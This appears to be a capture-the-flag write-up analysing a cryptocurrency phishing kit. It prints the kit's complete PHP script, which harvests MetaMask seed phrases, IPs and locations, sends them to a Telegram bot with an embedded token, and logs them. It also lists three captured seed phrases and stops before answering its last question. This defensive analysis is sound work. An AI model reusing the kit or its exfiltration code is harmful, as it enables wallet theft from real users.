Skip to main content

Solution

Hi,

recently I have finished challenge grabthephisher on cyber defenders.org. Let's check how to solve those puzzles.

#1 Which wallet is used for asking the seed phrase?

WWW display 3 wallets:

image-1658854441638.png

I checked structure of web site directory. Only one directory contained suspicious PHP script:

c75-GrabThePhisher\pankewk\metamask\metamask.php

#2 What is the file name that has the code for the phishing kit?

Suspicious file contains script written in PHP to gather intelligence and data from user.

#3 In which language was the kit written?

Script is written in PHP language.

#4 What service does the kit use to retrieve the victim's machine information?

Code of the scritpt:

<?php

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 
$array = json_decode($request);
$geo = $array->country->name_en;
$city = $array->city->name_en;
$date = date("m.d.Y"); //aaja


/*
 With love and respect to all the hustler out there,
 This is a small gift to my brothers,
 All the best with your luck,
 
 Regards, 
 j1j1b1s@m3r0
  
  */


    $message = "<b>Welcome 2 The Jungle </b> 
    
<b>Wallet:</b> Metamask
<b>Phrase:</b> <code>" . $_POST["data"] . "</code>
<b>IP:</b> " .$_SERVER['REMOTE_ADDR'] . " | " .$geo. " | " .$city. "
<b>User:</b> " . $_SERVER['HTTP_USER_AGENT'] . "";


sendTel($message);  
	
    function sendTel($message){
		$id = "5442785564"; 
        $token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10"; 
		$filename = "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$id."&text=".urlencode($message)."&parse_mode=html";
		file_get_contents($filename);
        $_POST["import-account__secret-phrase"]. $text = $_POST['data']."\n";;
        @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);	

    }
    
    
    ?>

Line 3 shows the phisher is using Sypex Geo service to gather intelligence

$request = file_get_contents("http://api.sypexgeo.net/json/".$_SERVER['REMOTE_ADDR']); 

#5 How many seed phrases were already collected?

Line 36 shows that all gathered data are stored in root directory of web page in log directory in log.txt file.

        @file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);

File log.txt contains 3 entries:

number edge rebuild stomach review course sphere absurd memory among drastic total
bomb stairs satisfy host barrel absorb dentist prison capital faint hedgehog worth
father also recycle embody balance concert mechanic believe owner pair muffin hockey

#6 Write down the seed phrase of the most recent phishing incident?

Line 36 shows that script is appending data in log file - FILE_APPEND. It means that, the last written value will be in last position.

#7 Which medium had been used for credential dumping?

 

Back to top